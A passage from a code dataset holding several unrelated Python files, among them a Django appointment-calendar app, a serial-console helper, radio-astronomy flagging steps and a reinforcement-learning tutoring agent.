driver)\n\t\t\t# recursive call\n\t\t\telse:\n\t\t\t\tfor xp in xpaths:\n\t\t\t\t\tclickElement(xp, False, driver)\n\t\t\t\t\t# we relaunch the script after click on the element associated to the xpath\n\t\t\t\t\t(found, new_xpaths) = findElementsInPage(driver)\n\t\t\t\t\tif found:\n\t\t\t\t\t\treturn True\n\t\t\t\treturn False\n\t\treturn found\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef runAdvancedCrawler(url, driver):\n\ttry:\n\t\tif url:\n\t\t\tprint('Crawling (advanced attempt): ' + url)\n\t\t\t# we first call the script with the second argument containing xpaths empty\n\t\t\treturn crawlPage(url, [], driver)\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n","sub_path":"bachelor 
project/advanced_crawler.py","file_name":"advanced_crawler.py","file_ext":"py","file_size_in_byte":5220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"385054992","text":"import cv2\r\ncap = cv2.VideoCapture('FAT.mp4')\r\ni = 0\r\nwhile(cap.isOpened()):\r\n ret, frame = cap.read()\r\n if ret == False:\r\n break\r\n cv2.imshow('hello', frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n cv2.imwrite(str(i) + '.jpg', frame)\r\n i += 1\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","sub_path":"FInalAssignment/Extractiing-frame-from-vid.py","file_name":"Extractiing-frame-from-vid.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"427875881","text":"#!/usr/bin/env python\n#\n# lib.py\n#\n# Helper code for CLI for interacting with switches via console device\n#\n\ntry:\n import click\n import re\n import subprocess\n import sys\nexcept ImportError as e: \n raise ImportError(\"%s - required module not found\" % str(e))\n\nDEVICE_PREFIX = \"/dev/ttyUSB\"\n\nERR_CMD = 1\nERR_DEV = 2\n\n# runs command, exit if stderr is written to, returns stdout otherwise\n# input: cmd (str), output: output of cmd (str)\ndef run_command(cmd):\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n output = proc.stdout.read()\n error = proc.stderr.read()\n if error != \"\":\n click.echo(\"Command resulted in error: {}\".format(error))\n sys.exit(ERR_CMD)\n return output\n\n# returns a sorted list of all devices (whose name matches DEVICE_PREFIX)\ndef getAllDevices():\n cmd = \"ls \" + DEVICE_PREFIX + \"*\"\n output = run_command(cmd)\n \n devices = output.split('\\n')\n devices = list(filter(lambda dev: re.match(DEVICE_PREFIX + r\"\\d+\", dev) != None, devices))\n devices.sort(key=lambda dev: int(dev[len(DEVICE_PREFIX):]))\n \n return devices\n\n# exits if inputted line number does not correspond to a device\n# input: linenum\ndef checkDevice(linenum):\n devices = getAllDevices()\n if DEVICE_PREFIX + str(linenum) not in devices:\n click.echo(\"Line number {} does not exist\".format(linenum))\n sys.exit(ERR_DEV)\n\n# returns a dictionary of busy devices and their info\n# maps line number to (pid, process start time)\ndef getBusyDevices():\n cmd = 'ps -eo pid,lstart,cmd | grep -E \"(mini|pico)com\"'\n output = run_command(cmd)\n processes = output.split('\\n')\n \n # matches any number of spaces then any number of digits\n regexPid = r\" *(\\d+)\"\n # matches anything of form: Xxx Xxx 00 00:00:00 0000\n regexDate = r\"([A-Z][a-z]{2} [A-Z][a-z]{2} \\d{2} \\d{2}:\\d{2}:\\d{2} \\d{4})\"\n # matches any non-whitespace characters ending in minicom or picocom, \n # then a space and any chars followed by /dev/ttyUSB, \n # then a space and any chars\n regexCmd = r\"\\S*(?:(?:mini)|(?:pico))com .*\" + DEVICE_PREFIX + r\"(\\d+)(?: .*)?\"\n regexProcess = re.compile(r\"^\"+regexPid+r\" \"+regexDate+r\" \"+regexCmd+r\"$\")\n \n busyDevices = {}\n for process in processes:\n match = regexProcess.match(process)\n if match != None:\n pid = match.group(1)\n date = match.group(2)\n linenum_key = match.group(3)\n busyDevices[linenum_key] = (pid, date)\n return busyDevices\n\n# returns baud rate of device corresponding to line number\n# input: linenum (str)\ndef getBaud(linenum):\n checkDevice(linenum)\n cmd = \"sudo stty -F \" + DEVICE_PREFIX + str(linenum)\n output = run_command(cmd)\n \n match = re.match(r\"^speed (\\d+) baud;\", 
output)\n if match != None:\n return match.group(1)\n else:\n click.echo(\"Unable to determine baud rate\")\n return \"\"\n","sub_path":"consutil/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"343486635","text":"# requests get和post\nimport requests\n\n# get\nr = requests.get('https://www.baidu.com')\nr.encoding = 'utf-8'\nprint(r.encoding)\nprint(r.text)\n# post\n# pr = requests.post('http://httpbin.org/post', data={'key': 'value'})\n\n# get带参数\n# r2 = requests.get('http://httpbin.org/get', params={'key1': 'value1', 'key2': 'value2'})\n# print(r2.url)\n","sub_path":"test02-requests-getpost.py","file_name":"test02-requests-getpost.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"474008013","text":"from datetime import datetime as dt\r\n\r\nimport jdatetime\r\nfrom django.shortcuts import redirect\r\nfrom django.utils.safestring import mark_safe\r\nfrom django.views.generic import ListView\r\n\r\nfrom .models import *\r\nfrom .utils import Calendar\r\n\r\nPERCENT = 0.10\r\n\r\n\r\ndef get_date(req_day):\r\n if req_day:\r\n year, month = (int(x) for x in req_day.split('-'))\r\n return year, month, 1\r\n return dt.today().year, dt.today().month, dt.today().day\r\n\r\n\r\nclass PatientCalendarView(ListView):\r\n model = Event\r\n template_name = 'calendar/calendar.html'\r\n\r\n def get_context_data(self, **kwargs):\r\n context = super().get_context_data(**kwargs)\r\n # use today's date for the calendar\r\n d = get_date(self.request.GET.get('day', None))\r\n\r\n doc = self.kwargs['pk']\r\n clicks, _ = CalenderWeekClicks.objects.get_or_create(doctor_user_id=doc, patient_user_id=self.request.user.id)\r\n back_or_forward = clicks.number_clicks\r\n\r\n if self.kwargs['week_num'] == '0':\r\n back_or_forward = 0\r\n\r\n clicks.number_clicks = back_or_forward\r\n clicks.save()\r\n cal = Calendar(d[0], d[1], d[2], doc, curr_user=self.request.user, offset=back_or_forward)\r\n\r\n # Call the formatmonth method, which returns our calendar as a table\r\n html_cal = cal.format_month()\r\n context['calendar'] = mark_safe(html_cal)\r\n context['doctor'] = doc\r\n return context\r\n\r\n\r\ndef next_week(request, pk, week_num):\r\n doc = pk\r\n clicks, _ = CalenderWeekClicks.objects.get_or_create(doctor_user_id=doc, patient_user_id=request.user.id)\r\n back_or_forward = clicks.number_clicks\r\n\r\n if week_num == '1':\r\n back_or_forward += 1\r\n elif week_num == '2':\r\n back_or_forward -= 1\r\n elif week_num == '0':\r\n back_or_forward = 0\r\n\r\n clicks.number_clicks = back_or_forward\r\n clicks.save()\r\n return redirect('doctor_calendar:calendar', pk=doc, week_num=3)\r\n\r\n\r\ndef doctor_next_week(request, week_num):\r\n doc = request.user\r\n clicks, _ = DoctorCalenderWeekClicks.objects.get_or_create(doctor_user_id=doc)\r\n back_or_forward = clicks.number_clicks\r\n\r\n # Instantiate our calendar class with today's year and date\r\n if week_num == '1':\r\n back_or_forward += 1\r\n elif week_num == '2':\r\n back_or_forward -= 1\r\n elif week_num == '0':\r\n back_or_forward = 0\r\n\r\n clicks.number_clicks = back_or_forward\r\n clicks.save()\r\n return redirect('doctor_calendar:schedule', week_num=3)\r\n\r\n\r\nclass DoctorCalenderView(ListView):\r\n model = Event\r\n template_name = 'calendar/doctor_calender.html'\r\n\r\n def get_context_data(self, **kwargs):\r\n context = 
super().get_context_data(**kwargs)\r\n\r\n # use today's date for the calendar\r\n d = get_date(self.request.GET.get('day', None))\r\n doc = self.request.user.id\r\n clicks, _ = DoctorCalenderWeekClicks.objects.get_or_create(doctor_user_id=doc)\r\n back_or_forward = clicks.number_clicks\r\n\r\n if self.kwargs['week_num'] == '0':\r\n back_or_forward = 0\r\n clicks.number_clicks = back_or_forward\r\n clicks.save()\r\n\r\n # Instantiate our calendar class with today's year and date\r\n cal = Calendar(d[0], d[1], d[2], self.request.user.pk, curr_user=self.request.user, offset=back_or_forward)\r\n # Call the formatmonth method, which returns our calendar as a table\r\n html_cal = cal.format_month()\r\n context['calendar'] = mark_safe(html_cal)\r\n return context\r\n\r\n\r\nclass VerifyView(ListView):\r\n template_name = 'calendar/verify.html'\r\n is_successful = False\r\n doctor = None\r\n date = None\r\n time = None\r\n\r\n def get_queryset(self):\r\n me = User.objects.get(is_staff=True)\r\n query_name = self.request.GET.get('q1')\r\n date_and_time = query_name.split('#')\r\n date = date_and_time[0].split(\"-\")\r\n self.date = date\r\n self.time = date_and_time[1]\r\n doctor = DoctorProfileInfo.objects.get(user_id=self.kwargs['pk'])\r\n self.doctor = doctor\r\n patient = PatientProfileInfo.objects.get(user_id=self.request.user)\r\n\r\n if patient.credit < doctor.fee:\r\n self.is_successful = False\r\n else:\r\n doctor.credit += doctor.fee\r\n patient.credit -= doctor.fee\r\n me.bank += doctor.fee / 10\r\n print(me.bank)\r\n me.save()\r\n doctor.save()\r\n patient.save()\r\n s = Event(doctor_user=User.objects.filter(pk=self.kwargs['pk'])[0], patient_user=self.request.user,\r\n title='رزرو شده',\r\n start_time=jdatetime.date(int(date[0]), int(date[1]), int(date[2])),\r\n start_hour=date_and_time[1])\r\n s.save()\r\n self.is_successful = True\r\n\r\n def get_context_data(self, **kwargs):\r\n context = {\r\n 'success': self.is_successful,\r\n 'address': self.doctor.address,\r\n 'name': self.doctor.user.name,\r\n 'lname': self.doctor.user.family_name,\r\n 'day': self.date[2],\r\n 'month': self.date[1],\r\n 'year': self.date[0],\r\n 'hour': self.time,\r\n 'doc_pk': self.doctor.user.pk\r\n\r\n }\r\n\r\n return context\r\n\r\n\r\ndef cancel(request, doc_pk, usr_pk, evt_pk):\r\n event = Event.objects.get(id=evt_pk)\r\n doctor = DoctorProfileInfo.objects.get(user_id=doc_pk)\r\n try:\r\n patient = PatientProfileInfo.objects.get(user_id=usr_pk)\r\n except Exception:\r\n patient = DoctorProfileInfo.objects.get(user_id=usr_pk)\r\n doctor.credit -= doctor.fee * (1 - PERCENT)\r\n patient.credit += doctor.fee * (1 - PERCENT)\r\n doctor.save()\r\n patient.save()\r\n event.delete()\r\n","sub_path":"SAD/doctor_calendar/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"588125150","text":"\n\n@with_seed()\ndef test_spatial_transformer_with_type():\n data = mx.sym.Variable('data')\n loc = mx.sym.Flatten(data)\n loc = mx.sym.FullyConnected(data=loc, num_hidden=10)\n loc = mx.sym.Activation(data=loc, act_type='relu')\n loc = mx.sym.FullyConnected(data=loc, num_hidden=6)\n sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10), transform_type='affine', sampler_type='bilinear')\n ctx_list = [{\n 'ctx': mx.gpu(0),\n 'data': (1, 5, 10, 10),\n 'type_dict': {\n 'data': np.float64,\n },\n }, {\n 'ctx': mx.cpu(0),\n 'data': (1, 5, 10, 10),\n 'type_dict': {\n 'data': np.float64,\n 
},\n }]\n check_consistency(sym, ctx_list)\n check_consistency(sym, ctx_list, grad_req='add')\n","sub_path":"Data Set/bug-fixing-1/f7a00250cf83ba34779b7c6ffc02532d20795f2f--fix.py","file_name":"f7a00250cf83ba34779b7c6ffc02532d20795f2f--fix.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"205890895","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.core.mail import send_mail\nfrom .models import Contact\n\n\ndef contact(request):\n if request.method == 'POST' and request.user.is_authenticated:\n listing_id = request.POST['listing_id']\n name = request.POST['name']\n listing = request.POST['listing']\n email = request.POST['email']\n phone = request.POST['phone']\n message = request.POST['message']\n user_id = request.POST['user_id']\n realtor_email = request.POST['realtor_email']\n\n # Проверка делали ли авторизованный пользователь запрос по дому\n\n if request.user.is_authenticated:\n user_id = request.user.id\n has_contacted = Contact.objects.all().filter(listing_id=listing_id, user_id=user_id)\n if has_contacted:\n messages.error(request, 'Вы уже делали запрос по этому дому')\n return redirect('/listings/'+listing_id)\n\n contact = Contact(listing=listing, listing_id=listing_id, name=name, email=email,\n phone=phone, message=message, user_id=user_id)\n\n contact.save()\n\n # Send email\n\n send_mail(\n 'Исходящий запрос с сайта BTRE: ' + listing,\n 'Запрос по дому' + listing + '. Зайдите в панель администратора, чтобы узнать больше.'\n + 'Электронная почта клиента: ' + email + '. Контактный телефон: ' + phone,\n 'krupin_anton@mail.ru',\n [realtor_email, 'krupin_anton@mail.ru', 'krupinanton87@gmail.com'],\n fail_silently=False\n )\n\n messages.success(request, 'Ваш запрос был отправлен. Риэлтор скоро свяжется с вами')\n\n return redirect('/listings/'+listing_id)\n\n else:\n listing_id = request.POST['listing_id']\n messages.error(request, 'Зарегистрирутесь или авторизуйтесь, чтобы оставить запрос.')\n return redirect('/listings/'+listing_id)\n","sub_path":"contacts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"54645140","text":"from functools import lru_cache\r\n\r\n# 吃掉一个橘子。\r\n# 如果剩余橘子数 n 能被 2 整除,那么你可以吃掉 n/2 个橘子。\r\n# 如果剩余橘子数 n 能被 3 整除,那么你可以吃掉 2*(n/3) 个橘子。\r\n\r\n\r\nclass Solution:\r\n def minDays(self, n: int) -> int:\r\n @lru_cache(None)\r\n def dfs(n: int) -> int:\r\n if n <= 1:\r\n return n\r\n return 1 + min(dfs(n // 2) + n % 2, dfs(n // 3) + n % 3)\r\n\r\n return dfs(n)\r\n\r\n # 简单bfs,即使是2e9最多也只用搜30多次\r\n def minDays2(self, n: int) -> int:\r\n res = 0\r\n queue = [n]\r\n visited = set()\r\n while queue: # bfs\r\n nextQueue = []\r\n for x in queue:\r\n if x == 0:\r\n return res\r\n visited.add(x)\r\n if x - 1 not in visited:\r\n nextQueue.append(x - 1)\r\n if x % 2 == 0 and x // 2 not in visited:\r\n nextQueue.append(x // 2)\r\n if x % 3 == 0 and x // 3 not in visited:\r\n nextQueue.append(x // 3)\r\n res += 1\r\n queue = nextQueue\r\n\r\n\r\nprint(Solution().minDays(10))\r\n# 输出:4\r\n# 解释:你总共有 10 个橘子。\r\n# 第 1 天:吃 1 个橘子,剩余橘子数 10 - 1 = 9。\r\n# 第 2 天:吃 6 个橘子,剩余橘子数 9 - 2*(9/3) = 9 - 6 = 3。(9 可以被 3 整除)\r\n# 第 3 天:吃 2 个橘子,剩余橘子数 3 - 2*(3/3) = 3 - 2 = 1。\r\n# 第 4 天:吃掉最后 1 个橘子,剩余橘子数 1 - 1 = 0。\r\n# 你需要至少 4 天吃掉 10 个橘子。\r\n","sub_path":"22_专题/最少操作次数/1553. 吃掉 N 个橘子的最少天数-倒着记忆化dfs.py","file_name":"1553. 
吃掉 N 个橘子的最少天数-倒着记忆化dfs.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"514510855","text":"import pigpio\r\nimport time\r\nimport threading\r\nimport numpy as np\r\nimport copy\r\n\r\nclass Mount(threading.Thread):\r\n def __init__(self, pin_h, pin_v):\r\n super(Mount, self).__init__()\r\n \r\n self.max_angle = {\r\n \"h\": { \"high\": 90, \"low\": -90 },\r\n \"v\": { \"high\": 0, \"low\": -80 }\r\n }\r\n self.step = { \"h\": 3, \"v\": 1 }\r\n self.add_move = { \"h\": 0, \"v\": 0 }\r\n self.interval = 10\r\n \r\n self.angle_home = { \"h\": -13, \"v\": -42 }\r\n self.angle = copy.deepcopy(self.angle_home)\r\n self.angle_new = copy.deepcopy(self.angle_home)\r\n self.pin = { \"h\": pin_h, \"v\": pin_v }\r\n self.io = pigpio.pi()\r\n time.sleep(0.3)\r\n\r\n def __del__(self):\r\n self.io.stop()\r\n\r\n def run(self):\r\n while True:\r\n self._update_angles()\r\n self._move()\r\n time.sleep(self.interval/1000.0)\r\n\r\n def set_new_angle(self, direction, new_angle):\r\n self.angle_new[direction] = np.clip(new_angle, self.max_angle[direction][\"low\"], self.max_angle[direction][\"high\"])\r\n\r\n def move_start(self, direction):\r\n speed = 1.0\r\n if (direction == \"up\"):\r\n self.add_move[\"v\"] = self.step[\"v\"] * speed\r\n elif (direction == \"down\"):\r\n self.add_move[\"v\"] = self.step[\"v\"] * speed * -1\r\n elif (direction == \"left\"):\r\n self.add_move[\"h\"] = self.step[\"h\"] * speed\r\n elif (direction == \"right\"):\r\n self.add_move[\"h\"] = self.step[\"h\"] * speed * -1\r\n\r\n def move_stop(self, direction):\r\n if (direction in (\"up\", \"down\")):\r\n self.add_move[\"v\"] = 0\r\n elif (direction in (\"left\", \"right\")):\r\n self.add_move[\"h\"] = 0\r\n elif (direction == \"center\"):\r\n self.angle_new = copy.deepcopy(self.angle_home)\r\n\r\n def _move(self):\r\n for direction, pin in self.pin.items():\r\n self.io.set_servo_pulsewidth(pin, self._get_pulse_width(self.angle[direction]))\r\n\r\n def _get_pulse_width(self, angle):\r\n pw = 500 + ( float(2000)/180 * (angle + 90) )\r\n return int( np.clip(pw, 500, 2500) )\r\n\r\n def _update_angles(self):\r\n for d in (\"h\", \"v\"):\r\n self.angle_new[d] += self.add_move[d]\r\n self.angle_new[d] = np.clip(self.angle_new[d], self.max_angle[d][\"low\"], self.max_angle[d][\"high\"])\r\n if (self.angle[d] != self.angle_new[d]):\r\n diff = self.angle_new[d] - self.angle[d]\r\n sign = 1 if diff >= 0 else -1\r\n self.angle[d] += self.step[d] * sign if abs(diff) > self.step[d] else diff\r\n","sub_path":"server/camera_mount.py","file_name":"camera_mount.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"301086798","text":"\"\"\"\n Veti primi un numar intreg de la tastatura.\n Va trebui sa printati suma numerelor pana la numarul respectiv.\n\n exemplu:\n Veti primi: 5\n Veti printa: 15\n\"\"\"\nn = int(input())\n\nsum = (n*(n+1))//2\n\nprint(sum)\n","sub_path":"session2/ex28.py","file_name":"ex28.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"472863657","text":"# ian.heywood@physics.ox.ac.uk\n\n\nimport pickle\nimport numpy\n\n\nproject_info = pickle.load(open('project_info.p','rb'))\n\n\nmyms = project_info['master_ms']\n\n\nclearstat()\nclearstat()\n\n\n# ------------------------------------------------------------------------\n# 
Frequency ranges to flag over all baselines\n\nbadfreqs = ['850~900MHz', # Lower band edge\n\t'1658~1800MHz', # Upper bandpass edge\n\t'1419.8~1421.3MHz'] # Galactic HI\n\nmyspw = ''\nfor badfreq in badfreqs:\n\tmyspw += '*:'+badfreq+','\nmyspw = myspw.rstrip(',')\n\nflagdata(vis = myms, \n\tmode = 'manual', \n\tspw = myspw)\n\n\n# ------------------------------------------------------------------------\n# Frequency ranges to flag over a subset of baselines\n# From the MeerKAT Cookbook\n# https://github.com/ska-sa/MeerKAT-Cookbook/blob/master/casa/L-band%20RFI%20frequency%20flagging.ipynb\n\nbadfreqs = ['900MHz~915MHz', # GSM and aviation\n\t'925MHz~960MHz',\t\t\t\t\n\t'1080MHz~1095MHz',\n\t'1565MHz~1585MHz', # GPS\n\t'1217MHz~1237MHz',\n\t'1375MHz~1387MHz',\n\t'1166MHz~1186MHz',\n\t'1592MHz~1610MHz', # GLONASS\n\t'1242MHz~1249MHz',\n\t'1191MHz~1217MHz', # Galileo\n\t'1260MHz~1300MHz',\n\t'1453MHz~1490MHz', # Afristar\n\t'1616MHz~1626MHZ', # Iridium\n\t'1526MHz~1554MHz', # Inmarsat\n\t'1600MHz'] # Alkantpan\n\nmyspw = ''\nfor badfreq in badfreqs:\n\tmyspw += '*:'+badfreq+','\nmyspw = myspw.rstrip(',')\n\nflagdata(vis = myms,\n\tmode = 'manual',\n\tspw = myspw,\n\tuvrange = '<600')\n\n\n# ------------------------------------------------------------------------\n# Clipping, quacking, zeros, autos\n# Note that clip will always flag NaN/Inf values even with a range \n\nflagdata(vis = myms,\n\tmode = 'quack',\n\tquackinterval = 8.0,\n\tquackmode = 'beg')\n\nflagdata(vis = myms,\n\tmode = 'manual',\n\tautocorr = True)\n\nflagdata(vis = myms,\n\tmode = 'clip',\n\tclipzeros = True)\n\nflagdata(vis = myms,\n\tmode = 'clip',\n\tclipminmax = [0.0,100.0])\n\n# ------------------------------------------------------------------------\n# Save the flags\n\nflagmanager(vis = myms,\n\tmode = 'save',\n\tversionname = 'basic')\n\n\nclearstat()\nclearstat()\n","sub_path":"oxkat/1GC_02_casa_basic_flags.py","file_name":"1GC_02_casa_basic_flags.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"284760504","text":"from lxml import etree\nfrom rest_framework import renderers\nfrom StringIO import StringIO\nfrom django.utils.xmlutils import SimplerXMLGenerator\nfrom django.utils.encoding import smart_text\nimport six\nimport datetime\n\n\n\nclass ScoringRiskXMLRenderer(renderers.BaseRenderer):\n\n def render(self, data, risk, accepted_media_type=None, renderer_context=None):\n \"\"\"\n Renders *obj* into serialized XML.\n \"\"\"\n if data is None or risk is None:\n return ''\n\n #scoring_results = etree.fromstring(scoring_results)\n\n stream = StringIO()\n\n xml = SimplerXMLGenerator(stream, self.charset)\n xml.startDocument()\n xml.startElement(\"Risk\", {'state': '%s' % risk.state,\n 'schemaVersion': '2.0',\n 'id': '%s' % risk.id,\n 'ownerUser': '%s' % risk.ownerUser,\n 'version': '%s' % risk.version, })\n\n #render the dataitems\n for dataitem in data:\n self._to_xml(xml, dict(dataitem.items()))\n\n\n xml.startElement(\"History\", {})\n xml.addQuickElement('Event', attrs={'type': 'created',\n 'user': '%s' % risk.ownerUser,\n 'timestamp': '%s' % datetime.datetime.utcnow(),\n 'serverNote': 'Created the new entity',\n 'userNote': '', })\n xml.endElement(\"History\")\n\n xml.endElement(\"Risk\")\n xml.endDocument()\n return stream.getvalue()\n\n def _to_xml(self, xml, data):\n if isinstance(data, dict):\n xml.addQuickElement('DataItem', attrs={'name': '%s' % data.get('name'),\n 'value': '%s' % data.get('value')})\n\n 
elif data is None:\n # Don't output any value\n pass\n\n else:\n xml.characters(smart_text(data))","sub_path":"dss/apps/engine/drivetrains/Risk_Renderer.py","file_name":"Risk_Renderer.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"211886125","text":"from pprint import pprint\nfrom random import uniform\nfrom random import random\nfrom random import shuffle\n\nfrom sklearn.feature_extraction import DictVectorizer\n# from sklearn.linear_model import SGDRegressor\nfrom sklearn.linear_model import LinearRegression\nfrom concept_formation.preprocessor import Flattener\nfrom concept_formation.preprocessor import Tuplizer\nfrom concept_formation.cobweb3 import Cobweb3Tree\n\nfrom planners.fo_planner import FoPlanner\nfrom planners.fo_planner import subst\nfrom planners.rulesets import functionsets\nfrom planners.rulesets import featuresets\n# from planners.fo_planner import arith_rules\nfrom agents.BaseAgent import BaseAgent\n\n# rules = arith_rules\nepsilon = .9\nsearch_depth = 2\n\n\ndef weighted_choice(choices):\n choices = [(w, c) for w, c in choices]\n shuffle(choices)\n total = sum(w for w, _ in choices)\n r = uniform(0, total)\n upto = 0\n for w, c in choices:\n if upto + w >= r:\n return c\n upto += w\n assert False, \"Shouldn't get here\"\n\n\ndef max_choice(choices):\n choices = [(w, random(), c) for w, c in choices]\n choices.sort(reverse=True)\n return choices[0][2]\n\n\ndef get_action_key(action):\n operator, mapping, effects = action\n return (operator.name, frozenset(mapping.items()))\n\n\nclass Stub:\n def __init__(self, v):\n self.v = v\n\n def predict(self, k):\n return self.v\n\n\nclass LinearFunc:\n\n def __init__(self):\n self.clf = LinearRegression()\n self.dv = DictVectorizer()\n self.X = []\n self.y = []\n\n def ifit(self, state):\n y = state['_q']\n del state['_q']\n self.X.append(state)\n self.y.append(y)\n self.clf.fit(self.dv.fit_transform(self.X), self.y)\n\n def categorize(self, state):\n X = self.dv.transform([state])\n resp = Stub(self.clf.predict(X)[0])\n return resp\n\n\nclass Tabular:\n\n def __init__(self, q_init=0, learning_rate=0.1):\n self.Q = {}\n self.q_init = q_init\n self.alpha = learning_rate\n\n def ifit(self, state):\n y = state['_q']\n del state['_q']\n\n x = frozenset(state.items())\n if x not in self.Q:\n self.Q[x] = self.q_init\n\n self.Q[x] = ((1 - self.alpha) * self.Q[x] + self.alpha * y)\n\n def categorize(self, state):\n x = frozenset(state.items())\n if x not in self.Q:\n self.Q[x] = self.q_init\n return Stub(self.Q[x])\n\n\nclass QLearner:\n\n def __init__(self, q_init=0, discount=1, func=None):\n self.func = func\n if self.func is None:\n self.func = Cobweb3Tree\n\n self.Q = {}\n self.q_init = q_init\n self.g = discount\n\n def __len__(self):\n return sum([self.Q[a].root.num_concepts() for a in self.Q])\n\n def get_features(self, state):\n return {str(a): state[a] for a in state}\n\n def evaluate(self, state, action):\n if state is None:\n return 0\n if action not in self.Q:\n return self.q_init\n state = self.get_features(state)\n return self.Q[action].categorize(state).predict(\"_q\")\n\n def update(self, state, action, reward, next_state, next_actions):\n q_max = 0\n if len(next_actions) > 0 and next_state is not None:\n q_max = max([self.evaluate(next_state, get_action_key(a))\n for a in next_actions])\n y = reward + self.g * q_max\n print(\"Updating with\", y)\n\n if action not in self.Q:\n self.Q[action] = self.func()\n\n state = 
self.get_features(state)\n state['_q'] = y\n self.Q[action].ifit(state)\n\n\nclass RLAgent(BaseAgent):\n\n def __init__(self, action_set):\n self.Q = QLearner(func=Cobweb3Tree)\n self.last_state = None\n self.last_action = None\n self.reward = None\n self.max_episodes = 5\n self.action_set = action_set.name\n\n def request(self, state):\n tup = Tuplizer()\n flt = Flattener()\n state = flt.transform(tup.transform(state))\n\n new = {}\n for attr in state:\n if (isinstance(attr, tuple) and attr[0] == 'value'):\n new[('editable', attr[1])] = state[attr] == ''\n for attr2 in state:\n if (isinstance(attr2, tuple) and attr2[0] == 'value'):\n if (attr2 == attr or attr < attr2 or (state[attr] == \"\"\n or state[attr2]\n == \"\")):\n continue\n if (state[attr] == state[attr2]):\n new[('eq', attr, attr2)] = True\n state.update(new)\n # pprint(state)\n\n # for episode in range(self.max_episodes):\n while True:\n\n print(\"#########\")\n print(\"NEW TRACE\")\n print(\"#########\")\n kb = FoPlanner([(self.ground(a),\n state[a].replace('?', 'QM') if\n isinstance(state[a], str) else\n state[a])\n for a in state], functionsets[self.action_set])\n\n curr_state = {x[0]: x[1] for x in kb.facts}\n next_actions = [a for a in kb.fc_get_actions(epsilon=epsilon)]\n trace_actions = []\n depth = 0\n\n while depth < search_depth:\n actions = [(self.Q.evaluate(curr_state, get_action_key(a)), a)\n for a in next_actions]\n\n print(\"NEXT ACTION WEIGHTS\")\n print(sorted([(w, a[0].name[0]) for w, a in actions],\n reverse=True))\n\n # operator, mapping, effects = weighted_choice(actions)\n operator, mapping, effects = max_choice(actions)\n # operator, mapping, effects = choice(action_space)\n\n self.last_state = curr_state\n self.last_action = get_action_key((operator, mapping, effects))\n trace_actions.append(subst(mapping, operator.name))\n\n for f in effects:\n kb.add_fact(f)\n\n # if not termainal, then decrease reward\n # self.reward = -1\n self.reward = 0\n curr_state = {x[0]: x[1] for x in kb.facts}\n depth += 1\n\n # check if we're in a terminal state\n # if so, query oracle\n for f in effects:\n f = self.unground(f)\n if f[0] == 'sai':\n response = {}\n response['label'] = str(trace_actions)\n response['selection'] = f[1]\n response['action'] = f[2]\n response['inputs'] = {'value': f[3]}\n # {a: rg_exp[3+i] for i, a in\n # enumerate(input_args)}\n # response['inputs'] = list(rg_exp[3:])\n response['foas'] = []\n # pprint(response)\n print(\"EXECUTING ACTION\", self.last_action)\n print(\"Requesting oracle feedback\")\n\n return response\n\n # punish for failed search\n if depth >= search_depth:\n # self.reward -= 3 * search_depth\n curr_state = None\n next_actions = []\n else:\n # because we're not terminal we can compute next_actions\n next_actions = [a for a in\n kb.fc_get_actions(epsilon=epsilon,\n must_match=effects)]\n\n self.Q.update(self.last_state, self.last_action, self.reward,\n curr_state, next_actions)\n\n # return {}\n\n def train(self, state, label, foas, selection, action, inputs, correct):\n # tup = Tuplizer()\n # flt = Flattener()\n # state = flt.transform(tup.transform(state))\n # pprint(state)\n if ((self.last_state is None or self.last_action is None or\n self.reward is None)):\n return\n\n print(\"CORRECTNESS\", correct)\n\n # add reward based on feedback.\n if correct:\n self.reward += 1 # * search_depth\n # else:\n # self.reward -= 1 # 2 * search_depth\n\n # terminal state, no next_actions\n next_actions = []\n\n print(\"LAST ACTION\", self.last_action, self.reward)\n 
